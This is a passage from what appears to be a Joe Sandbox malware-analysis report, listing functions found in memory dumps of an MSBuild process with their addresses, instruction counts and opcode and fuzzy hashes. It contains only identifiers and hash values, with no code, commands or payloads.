                              • Source File: 0000000B.00000002.3815186838.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_121d000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 88211d77e69079f31196b7b417950680856f3b335faa26eafb243f08b567404d
                              • Instruction ID: 5aeb32a50db0d2559d447ea2df7e128cd34e7dd82da38df33fe2c89bce4f8f02
                              • Opcode Fuzzy Hash: 88211d77e69079f31196b7b417950680856f3b335faa26eafb243f08b567404d
                              • Instruction Fuzzy Hash: 0B214B71510388DFDF05DF94E8C4F16BBA6FB98314F248669EA0D0B24AC376D416CBA1
                              Function 05E57750 Relevance: .1, Instructions: 74COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 094cab09ee389acab1dbedc3f644e63b77941e2c732820725f8a4ddd7d271927
                              • Instruction ID: 0a68ec5ce1bff4a9325ad67511251bd414ee0f33d96604f9a6c091db35226b29
                              • Opcode Fuzzy Hash: 094cab09ee389acab1dbedc3f644e63b77941e2c732820725f8a4ddd7d271927
                              • Instruction Fuzzy Hash: 5A21D031A00618CFDB14CF68EA84A6ABBF5FF487A6F1580A8DD459B261D730EC50CB60
                              Function 05E5FA78 Relevance: .1, Instructions: 67COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ed469508da688cedba95e5da730a3b004b4b0b47759edfaa8dd9d9e45fd8a860
                              • Instruction ID: d2d66a8c931cc419ec0a4049b3a8ea6b0a6e8b4d112f9f0474ba4c5ca69885ce
                              • Opcode Fuzzy Hash: ed469508da688cedba95e5da730a3b004b4b0b47759edfaa8dd9d9e45fd8a860
                              • Instruction Fuzzy Hash: 8A218CB1E0161ADFCB14CF64D584D6ABBF2FF88224B108168D848AB721D730ED41CB91
                              Function 05E51400 Relevance: .1, Instructions: 64COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a4f3c56ddaeb6879a8a937bcb18a2ccd8957bcc0c0a25b53ffec2b58b048c8ee
                              • Instruction ID: bde5f9cd1aee19c025703e1f339b8cb1d4a1082280c1b955503c7fb52747487e
                              • Opcode Fuzzy Hash: a4f3c56ddaeb6879a8a937bcb18a2ccd8957bcc0c0a25b53ffec2b58b048c8ee
                              • Instruction Fuzzy Hash: 4E216D35A00248AFEF18CFD4D840BAEBBB6FF48320F008459EA91AB355DA359845CB40
                              Function 05E572A0 Relevance: .1, Instructions: 63COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ee7fa95f64c0adec5b68cc0313a22b328361d07866c9a5b1dbe1cf5ef1987e4
                              • Instruction ID: af555389ed84fc506a06f8e807bcfcb96474dc339224050dc857dc2859838f1d
                              • Opcode Fuzzy Hash: 4ee7fa95f64c0adec5b68cc0313a22b328361d07866c9a5b1dbe1cf5ef1987e4
                              • Instruction Fuzzy Hash: 08116172B446205FD3659A68DC40F2BB7E6EBC8674F11417AEA46DB390DE70DC0187E4
                              Function 05E5FA68 Relevance: .1, Instructions: 63COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2295043f4194920c4dc7900611b413a6a5d8228b50554563428619dcca24d817
                              • Instruction ID: 164d006c66f00a00f55549a041b28212d05a4d8ad0e7cbec291b0a70d3e24659
                              • Opcode Fuzzy Hash: 2295043f4194920c4dc7900611b413a6a5d8228b50554563428619dcca24d817
                              • Instruction Fuzzy Hash: EB21A1B5E01616CFDB15CF64D544A6ABBF2FF48214B1482A9D848AB722C730EC05CFD1
                              Function 05E53A70 Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6a940e26f32aeb96fbb42d2d6c70aee85be81b7596939628c77811bee2e705ef
                              • Instruction ID: 080db3175dd0c342f4af6f7fa0cae6fdbc2940f898d98338bc84c74766bf11cc
                              • Opcode Fuzzy Hash: 6a940e26f32aeb96fbb42d2d6c70aee85be81b7596939628c77811bee2e705ef
                              • Instruction Fuzzy Hash: D111063160025A9FDB09DF68D8506AFBFF2FF89360F05846AD904DB252DB308814CBE1
                              Function 0121D637 Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815186838.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_121d000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dc3560dc824a756a5356b05b1d203d9ef1e49879a247c8f5d21cd0ce87d99520
                              • Instruction ID: 493449bfd8c56b75a663a0773af52d7d0175a2ce2bf464440e2666967ea99888
                              • Opcode Fuzzy Hash: dc3560dc824a756a5356b05b1d203d9ef1e49879a247c8f5d21cd0ce87d99520
                              • Instruction Fuzzy Hash: 0C21D276404284DFCF06CF54D9C4B56BFB2FB88314F2886A9D9480B65BC33AD416CB91
                              Function 05E58CD3 Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e630027a0180e0326ec3b22334a1e19f18d0b862fddbf2aee2e41992611035ae
                              • Instruction ID: 02b8ea68a5f75c99c3ada3ee8de3884d6d03fbed1d945bd4fd97c89a109b8ca3
                              • Opcode Fuzzy Hash: e630027a0180e0326ec3b22334a1e19f18d0b862fddbf2aee2e41992611035ae
                              • Instruction Fuzzy Hash: DC11C672A086098BDB24DB95D9586EEBBF5FF98624F24406ADC42E3344DB329D04CB90
                              Function 05E56B78 Relevance: .1, Instructions: 55COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5fd914bb78c95a0d2cf000d4c704094c5f9e8144acef6b812f4457f354a6c2d4
                              • Instruction ID: 34bd151deeff7573e4f972cd0b0446818ca6746d97aa24595d27b6a39add6947
                              • Opcode Fuzzy Hash: 5fd914bb78c95a0d2cf000d4c704094c5f9e8144acef6b812f4457f354a6c2d4
                              • Instruction Fuzzy Hash: 1B1182356102059FC704DF68D848E9EBFF6FF99324B148559E9098B362DB71ED02CB90
                              Function 05E5FB50 Relevance: .1, Instructions: 52COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 69f25e0ed30efd6583013986fd796ed66015e579cae3d1d7ec76a0837f20fae7
                              • Instruction ID: 14abf68b801be6343a7af65ade191f491e9ff07a4942deb43c0e7d6e0d45d1a0
                              • Opcode Fuzzy Hash: 69f25e0ed30efd6583013986fd796ed66015e579cae3d1d7ec76a0837f20fae7
                              • Instruction Fuzzy Hash: 7A11ADB1700205DFDB14DF24D484A6AFBF6FF88224B00866AE849CB351DB39ED05CB90
                              Function 05E5FB43 Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5baaa19295e38838ae6455f2af74b71e9de24fac7e13b1da1e8f4e0d24958530
                              • Instruction ID: e514a022a1ba414712d2fa2aa3c375710174de9cd5e083cb6854b061a98a82f3
                              • Opcode Fuzzy Hash: 5baaa19295e38838ae6455f2af74b71e9de24fac7e13b1da1e8f4e0d24958530
                              • Instruction Fuzzy Hash: 8511ADB5600605DFDB15CF24D484A6AFBF6FF88224B14866AE849CB712CB38ED05CB90
                              Function 05E55A81 Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8c99e66e312d16487e775ba9188ac85c2e31ad2a31d4ea1773270fa6198254bd
                              • Instruction ID: df16220627346023ced3513ffcd94ab5caad92924ed242e2206b76f67337fe13
                              • Opcode Fuzzy Hash: 8c99e66e312d16487e775ba9188ac85c2e31ad2a31d4ea1773270fa6198254bd
                              • Instruction Fuzzy Hash: F301D4367002186BDB249FA4CC40BAFB7A6FB88320F008529FB15AB780DA31DD058BD0
                              Function 05E57290 Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 19e2e8e55684ab27b5cfec27181048131a7bb382d4182463f66b6415e8819612
                              • Instruction ID: 3a34b4ec241a364f0045e21e10e507fa2f6cbc5ee456132868483608a25cf6f3
                              • Opcode Fuzzy Hash: 19e2e8e55684ab27b5cfec27181048131a7bb382d4182463f66b6415e8819612
                              • Instruction Fuzzy Hash: EA017C717006249FD3558B68DC80E6BB7EAEB8D7B0B114129EE4ACB350DE30EC0287A0
                              Function 05E519F8 Relevance: .0, Instructions: 50COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 71dce71b5dd56a8460588c10db342b85c739f518a3f9c40f10022e7d60e439ed
                              • Instruction ID: 1aa2d8b719bfde3b87031ed840fcbc9a7f50bfaba8e5cbf89116769fd3d9b453
                              • Opcode Fuzzy Hash: 71dce71b5dd56a8460588c10db342b85c739f518a3f9c40f10022e7d60e439ed
                              • Instruction Fuzzy Hash: EC1112712007058FD725DF29E880A8B7BE1EF99310B008B29E44ACB665EB70FD198B95
                              Function 05E56B88 Relevance: .0, Instructions: 50COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 78f836d2c086a0c4d180cb9d3f5bb327bfff889dd9dec39b15fdc0a2576217db
                              • Instruction ID: c565b019d5a3a699c3a4b5382b3265f40386ccf8d81ed89a74e138762e612a19
                              • Opcode Fuzzy Hash: 78f836d2c086a0c4d180cb9d3f5bb327bfff889dd9dec39b15fdc0a2576217db
                              • Instruction Fuzzy Hash: 3611A0356102099FC704DF28C884D9EBBF2FF88324B108199E809CB322CB71ED02CB90
                              Function 05E51A08 Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3d2b519f10d303e83620c046aed6436c993ae776fabe44bbe996981ee7ea9160
                              • Instruction ID: b1d8f381636a2f8f9b426f45bc5b449c6226869aaaa424d6031cf9f97070608c
                              • Opcode Fuzzy Hash: 3d2b519f10d303e83620c046aed6436c993ae776fabe44bbe996981ee7ea9160
                              • Instruction Fuzzy Hash: 4D0100712007058FD725DF29E88098BBBF6FF89310B008A29E44A8B625EB71FD158B95
                              Function 0121D921 Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815186838.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_121d000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ea67047f773cdd3e47388769598f2d5bb76f27ae6a2385e4c752127123e1a765
                              • Instruction ID: 8ed3c003f7500d91c7ef282d9ca0c697e0c068ac860a9219ec3696f120dcfebe
                              • Opcode Fuzzy Hash: ea67047f773cdd3e47388769598f2d5bb76f27ae6a2385e4c752127123e1a765
                              • Instruction Fuzzy Hash: 32012B71114348DBF710CE55CD88B27FFDADF51220F04C55AEE495B187D2759800CAB2
                              Function 05E59B00 Relevance: .0, Instructions: 41COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 58a664d3b67b7d2680f799070ca68fc7e47af9bf4913797b62ad63f1b0e737cc
                              • Instruction ID: 7cff3aee4463d58c63648bf303c57865db60ff89cb9b6b0f0215dc1f7940354e
                              • Opcode Fuzzy Hash: 58a664d3b67b7d2680f799070ca68fc7e47af9bf4913797b62ad63f1b0e737cc
                              • Instruction Fuzzy Hash: 70F0B436708225CFBB48DEA8F4005EA7BEBEB441B5B1401ABE50DC7241EE31D841C788
                              Function 05E5AE40 Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1a005b063439021fe27b804c8637b94a141f81ddb8ab97da0f6e0b4b5d06cc10
                              • Instruction ID: e978ed4471905d781e3a25dd0d428a67c2d3e715a2ac97d2593a35f1e4b42502
                              • Opcode Fuzzy Hash: 1a005b063439021fe27b804c8637b94a141f81ddb8ab97da0f6e0b4b5d06cc10
                              • Instruction Fuzzy Hash: BFF0B431600628AFCB25DB4CE484E56F7AAFB89331F12D236D84997242CF30EC4187D5
                              Function 0121D920 Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3815186838.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_121d000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a49d63134184478527460e6b5eab0837226c2230582062128159b32301956176
                              • Instruction ID: 8aad09a2d090f7f4ec9012e0d151f190611acc7aafa5f0234cda3c8b67f2cd9a
                              • Opcode Fuzzy Hash: a49d63134184478527460e6b5eab0837226c2230582062128159b32301956176
                              • Instruction Fuzzy Hash: 69F0C272005348AFE7108E0AC988B62FFD9EB51634F18C55AEE481F287C2799840CAB1
                              Function 05E5AE01 Relevance: .0, Instructions: 26COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 660613338a93ed07d55b89c41746fd9fd4278371e406109fe55e33c9619c6341
                              • Instruction ID: ebefcc755b0f0be5ef79694a53ad1a703f3afedaf5551b66ac6215424f51d5ed
                              • Opcode Fuzzy Hash: 660613338a93ed07d55b89c41746fd9fd4278371e406109fe55e33c9619c6341
                              • Instruction Fuzzy Hash: 46E0C23278061017DB081A8EA89567E7A9FE7CD637B144236EB0CC3341CF5CCC0246A4
                              Function 05E59B60 Relevance: .0, Instructions: 22COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 01160f8849a230812d9a92e314c0acef01e8eb68f0f79f5a451084bb370e543f
                              • Instruction ID: 4e2db13144284c24b93e058ce47eaa92b1b3df0e5472001d085f71524a840887
                              • Opcode Fuzzy Hash: 01160f8849a230812d9a92e314c0acef01e8eb68f0f79f5a451084bb370e543f
                              • Instruction Fuzzy Hash: 57D02B3330413853D7011244B4072DDBF5BDBC49B3F044052F50CD2251DF4A940246CC
                              Function 05E5AE10 Relevance: .0, Instructions: 22COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fe86efb0c144517c7cb0b0c524c51967589ec88c9dc9fd99917d351313d833ba
                              • Instruction ID: fd9758017351d0df3898bc1d62d9ac2e5bc90cb0792592f1a60b4c46fe1d3d52
                              • Opcode Fuzzy Hash: fe86efb0c144517c7cb0b0c524c51967589ec88c9dc9fd99917d351313d833ba
                              • Instruction Fuzzy Hash: 20D05E32705210171618164F689887FBA8FE7C8537314013BEA09C3300DE98CC0242A4
                              Function 05E5A448 Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4da36fc8a05fbd97e6fa7036060e6bbe803204ea81907a980cb855db051bfcd8
                              • Instruction ID: c8dde576a583f46b0406533b3dc076023128691172b1113f6e2b9675732404d8
                              • Opcode Fuzzy Hash: 4da36fc8a05fbd97e6fa7036060e6bbe803204ea81907a980cb855db051bfcd8
                              • Instruction Fuzzy Hash: 11D0A7397504148FCB04CBACE4556E977B2DFC512135440F1D205CB231CBB0DC108780
                              Function 05E5A6BA Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 75b65ae8d4b30f4b5997bc0a49b30298ff1e8d452def0c9e5a4ad18f377d538b
                              • Instruction ID: 29bc474d259493f815d462d6b6bc0ea25bffc233b689ae9c2551bbc3c891bbb9
                              • Opcode Fuzzy Hash: 75b65ae8d4b30f4b5997bc0a49b30298ff1e8d452def0c9e5a4ad18f377d538b
                              • Instruction Fuzzy Hash: 66D0A7397504148FCB00C7ACD4552E97BB2DFC511134400B1D205CB221DB60DC118740
                              Function 05E5A909 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f5d3d39114ab090548c3f34bb576be51a8bfefac4d666f63cda9d9a597007c9
                              • Instruction ID: d0a53a6d4431aa6ede16210cc1c5ad2d3cdd406462dedccde6a5c7fda126f372
                              • Opcode Fuzzy Hash: 4f5d3d39114ab090548c3f34bb576be51a8bfefac4d666f63cda9d9a597007c9
                              • Instruction Fuzzy Hash: 33D05E35B50014DFCB04CBA8F4146D93BA1DF8812575140A5D256CB223DB61DC154B41
                              Function 05E5A1A1 Relevance: .0, Instructions: 14COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4c59bc375333c08983fd0d1698f617ec28ee11039c80166c841f3958b88520f
                              • Instruction ID: 0495b0798856e706cba2c418618e678be5957dc8c379bec28506885cf742433f
                              • Opcode Fuzzy Hash: b4c59bc375333c08983fd0d1698f617ec28ee11039c80166c841f3958b88520f
                              • Instruction Fuzzy Hash: 1BD0C935B500148F8B44DBACE5545DD7BF2EFC822674101B6E209CB625DB70D9118B91
                              Function 05E5A10C Relevance: .0, Instructions: 14COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f9e203be33f5197dd9e2522721de115a9bc13478f877fc6c63cb1f13beb3b205
                              • Instruction ID: 3d7456a3b4a8996598997372db959974167c70050a9d29f2e4fe4f84774b7b17
                              • Opcode Fuzzy Hash: f9e203be33f5197dd9e2522721de115a9bc13478f877fc6c63cb1f13beb3b205
                              • Instruction Fuzzy Hash: B6D0C935B400048F8B44EBA9E0905DC7BF2EF8822675000B6E209CB620DB309C118F41
                              Function 05E5A374 Relevance: .0, Instructions: 13COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 758e4401d286555b0ff466bb55e34bf3777e1da0caabd46ac206fdd5e2781777
                              • Instruction ID: f207c16f2668b095b3a355ec5703becba03a31901b1862a8f4743b9df1c7e692
                              • Opcode Fuzzy Hash: 758e4401d286555b0ff466bb55e34bf3777e1da0caabd46ac206fdd5e2781777
                              • Instruction Fuzzy Hash: 4FD01235B900008F9B48DBA8E0108EC37E6EFC822A70010B6E20BCBA31DB309C61CB80
                              Function 05E5ADD8 Relevance: .0, Instructions: 7COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 59cf4b242c7bcb254f749b7e3f7873688de6cafca8a1c3eb2cf3a8ada957db73
                              • Instruction ID: 75154b6f031a3fd00e37b9143a411a16f10f2acd7799484fec4108db1f6e530c
                              • Opcode Fuzzy Hash: 59cf4b242c7bcb254f749b7e3f7873688de6cafca8a1c3eb2cf3a8ada957db73
                              • Instruction Fuzzy Hash: E4C08C1250E688ABCE11AB28A8B638EBF85ABA0351F3808A9C58486082D128481BC612
                              Function 05E5ADE8 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb669055142085773027e09a5d338183d92efbe665d3d9376aa1cef7d071219a
                              • Instruction ID: ade1d4d1b1fcee9e86ac96a5143b04d4faa0353837d2ed58526d9400767eec4a
                              • Opcode Fuzzy Hash: eb669055142085773027e09a5d338183d92efbe665d3d9376aa1cef7d071219a
                              • Instruction Fuzzy Hash: 0CC09230501244CFCB0ACF30C068804BB72BF5230676940D8D0098B532C73ADC82CB00